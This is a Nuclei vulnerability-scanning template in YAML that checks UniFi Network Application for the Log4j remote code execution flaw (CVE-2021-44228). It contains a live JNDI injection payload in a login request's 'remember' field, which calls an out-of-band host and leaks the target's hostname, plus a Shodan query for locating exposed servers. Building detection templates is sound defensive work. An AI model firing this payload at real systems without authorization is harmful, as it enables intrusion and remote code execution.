nuclei-templates/vulnerabilities/other/unifi-network-log4j-rce.yaml

54 lines
1.8 KiB
YAML

id: unifi-network-log4j-rce
info:
name: UniFi Network Application - Remote Code Execution (Log4j)
author: KrE80r
severity: critical
description: |
UniFi Network Application is susceptible to a critical vulnerability in Apache Log4j (CVE-2021-44228) that may allow for remote code execution in an impacted implementation.
reference:
- https://community.ui.com/releases/UniFi-Network-Application-6-5-55/48c64137-4a4a-41f7-b7e4-3bee505ae16e
- https://twitter.com/sprocket_ed/status/1473301038832701441
- https://logging.apache.org/log4j/2.x/security.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
metadata:
verified: true
shodan-query: http.title:"UniFi Network"
tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi
requests:
- raw:
- |
POST /api/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json; charset=utf-8
Origin: {{RootURL}}
Referer: {{RootURL}}/manage/account/login?redirect=%2Fmanage
{"username":"user","password":"pass","remember":"${jndi:ldap://${hostName}.{{interactsh-url}}}","strict":true}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns" # Confirms the DNS Interaction
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
extractors:
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
# Enhanced by mp on 2022/06/03